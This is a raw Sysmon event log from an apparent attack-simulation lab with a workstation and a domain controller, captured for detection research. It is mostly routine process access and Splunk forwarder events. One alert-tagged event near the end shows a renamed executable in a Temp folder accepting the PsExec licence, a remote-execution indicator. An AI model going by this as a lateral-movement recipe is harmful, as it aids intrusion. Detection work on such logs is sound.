ystem32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218106Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.426{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218105Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.426{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218104Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.426{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218103Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.426{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218102Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.426{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218101Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.426{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218100Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.426{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218099Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.426{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218098Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.426{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-136B-6216-9704-000000003902}2792C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218097Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.426{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-136B-6216-9704-000000003902}2792C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218096Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.427{4F8D34B0-136B-6216-9704-000000003902}2792C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000293553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:51.171{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:51.170{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:51.005{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218111Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:52.801{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84113318AD147715EFF2F5242C94D226,SHA256=E5CA68A76EA97C24E755BD44668943710ADBB400CB5C08B465AC81967D9EBBCC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:50.625{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53815-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000293559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:50.464{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53814-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000293558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:50.464{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53814-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000293557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:52.412{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D405F7C9EA8EDEC020C5FA53EC11BEB1,SHA256=5A6D00D571083B4827CFC08D5C8198C414B2D0F59EBEBF4FA71D76E63C005A00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218110Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:52.442{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4F46AAE0978F9310B93C12F2CE4A840A,SHA256=98D83EA2BB60719E4D0BA904713F26126A8AD9E607E8B9B8B9EAF5EDA0AA2ACF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218113Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:53.817{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63E4EA9FD3D66D2E69734EA2F540DED3,SHA256=9B4F603F5D4B59CCB097A842323643A795D99D90B7BA66F1B314DD0CD2C120C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:53.421{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B022DFC432FD2DC876B26C5CE9AB819E,SHA256=6A19A48040054505ECB6D1101374DBC3E84927CA4131C7FB05D85197AEAFF3BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218112Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.578{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51436-false10.0.1.12-8000- 23542300x8000000000000000293562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:54.436{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEB1ABD8F6FA167C138E7319015E159F,SHA256=947C4B6B54540244AF809E0ED9CCE456FCB982B5109542188F0349E651B67619,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:55.450{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA2BA38E53E6603155632EE7A85C7CE8,SHA256=668F3964E0CCA7B4D7315E8E8134E242E093F61A0DEA9ADBE853C2EE5754C43D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218114Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:55.051{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF0A7E06CBA3BB9887A382BA898EB641,SHA256=74DFE89CA1D301052DF5BF5A87C0C4DF1F1317E6F4F75FD3D6B4CA7B2EBE694E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:56.455{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC56F498E79C724F58FF1291D2CBE8A8,SHA256=1F1DD8BDAB2B8133909E6F855756B096B972E46F986BE304314610BA74217552,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218115Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:56.067{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A01992B28069DA5CAD2DA49B900D544,SHA256=6124AE5830BAB2FF224A73F256FBE32994D7509B369108B9E3BC06759CE08DC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:57.468{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EEDC44C8E6C9CA41901966336A27196,SHA256=6CC5BCEAAFF97A15DFF2DA2DF74FDF7DB71E95D7551595E0841B22A7EC8000B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218117Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:55.687{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51437-false10.0.1.12-8000- 23542300x8000000000000000218116Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:57.098{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF79BF5E1BD8DA0563F1B1E067072D5C,SHA256=51BCEE4F24B2DDF15EB219DE9EC480E09A6636A202E8BFADD843E7B70DC0BEAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218118Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:58.223{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFEE56AF0EF8D1FC9F4F44A758AA4CED,SHA256=E2C23A47A2BE573FD39E2797811C118833ECD94E3369028D3DC926FB235B732A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:56.626{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53816-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:58.487{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35D62160C96B8EA6EA214FAB9D5064A5,SHA256=4DE8361901705855C10847BCF13EC4DAA79A1EEAE880A3879F423177302077A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218119Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:59.379{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B239D57A74C6B9D9BEE573F4512AF3B,SHA256=00F474229BC792FE8A6B2D79B9BBB532308118AD30104889A2CFDE5327B6A8D2,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000293594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:58:59.659{C8EA50B7-1373-6216-6806-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000293593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.545{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1373-6216-6B06-000000003802}6308C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 